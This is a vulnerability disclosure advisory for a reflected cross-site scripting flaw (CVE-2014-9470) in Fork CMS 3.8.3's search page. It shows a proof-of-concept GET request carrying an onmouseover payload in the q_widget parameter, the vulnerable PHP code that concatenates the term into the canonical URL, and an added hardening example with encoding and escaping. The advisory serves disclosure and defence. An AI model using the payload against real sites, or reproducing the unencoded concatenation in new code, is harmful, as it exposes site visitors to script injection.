
Fork CMS 3.8.3 Cross Site Scripting

2015-01-13 00:00:00
Phi Le Ngoc
packetstormsecurity.com

EPSS: 0.008 (Low), percentile 81.3%

# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc phi ([email protected]) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470

::VULNERABILITY DETAIL::

- Vulnerable parameter: q_widget
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function: loadForm()

- Attack vector:

```http
GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive
```

- Vulnerable code (the q_widget value is copied into $_GET['q'] and then concatenated into the canonical URL without any encoding):

```php
private function loadForm()
{
    // create form
    $this->frm = new FrontendForm('search', null, 'get', null, false);

    // could also have been submitted by our widget
    if (!\SpoonFilter::getGetValue('q', null, '')) {
        $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
    }

    // create elements
    $this->frm->addText(
        'q',
        null,
        255,
        'inputText liveSuggest autoComplete',
        'inputTextError liveSuggest autoComplete'
    );

    // since we know the term just here we should set the canonical url here
    $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search');
    if (isset($_GET['q']) && $_GET['q'] != '') {
        $canonicalUrl .= '?q=' . $_GET['q'];
    }
    $this->header->setCanonicalUrl($canonicalUrl);
}
```
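The vendor's actual fix is in the commit referenced below; as an added illustration that is not Fork CMS code, the script below models the term handling that loadForm() performs and shows a hardened version beside the raw concatenation: the term is percent-encoded when the canonical URL is built and HTML-escaped again when the tag is emitted. Function names, the forkcms.local base URL and the rendered `<link rel="canonical">` markup are assumptions.

```php
<?php
// Added example, not Fork CMS code: hardened handling of the search term
// that loadForm() trusts, kept side by side with the raw concatenation.

// Same fallback as the vulnerable code: use q_widget when q is missing/empty.
function resolveSearchTerm(array $get): string
{
    $term = isset($get['q']) ? (string) $get['q'] : '';
    if ($term === '') {
        $term = isset($get['q_widget']) ? (string) $get['q_widget'] : '';
    }
    return $term;
}

// Hardened: percent-encode the term instead of appending it raw. Double
// quote, equals sign, parentheses and apostrophe all become %XX sequences.
function buildCanonicalUrl(string $base, string $term): string
{
    return $term === '' ? $base : $base . '?' . http_build_query(['q' => $term]);
}

// Hardened: escape again at the output sink, so a URL built elsewhere
// without encoding still cannot terminate the href attribute.
function renderCanonicalLink(string $url): string
{
    $href = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<link rel="canonical" href="' . $href . '">';
}

// Constructed query taken from the advisory's request (assumed host).
$get  = ['form' => 'search', 'q_widget' => '"onmouseover="alert(\'XSS\')"', 'submit' => 'Search'];
$base = 'http://forkcms.local/en/search';
$term = resolveSearchTerm($get);

$rawUrl  = $base . '?q=' . $term;            // what the vulnerable code builds
$safeUrl = buildCanonicalUrl($base, $term);  // what the hardened code builds

echo 'raw URL:       ', $rawUrl, PHP_EOL;
echo 'hardened URL:  ', $safeUrl, PHP_EOL;
echo 'hardened link: ', renderCanonicalLink($safeUrl), PHP_EOL;

// The raw URL carries the term's double quotes unchanged; the hardened URL
// and tag contain none, so the attribute cannot be broken out of.
assert(strpos($rawUrl, '"') !== false);
assert(strpos($safeUrl, '"') === false);
assert(strpos(renderCanonicalLink($safeUrl), 'onmouseover="') === false);
```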
  
::DISCLOSURE::

- 12/25/2014: Detected vulnerability
- 12/25/2014: Informed vendor; vendor confirmed
- 12/26/2014: Vendor releases patch
- 12/26/2014: ITAS Team publishes information

::REFERENCE::

- http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
- https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114

::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

----------------------------------------------------------------------------

ITAS Team

ITAS Corp. Be protected with us
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel : +84 - 8 - 38931952 Hotline : 0903445711
Email : [email protected]
http://www.itas.vn/
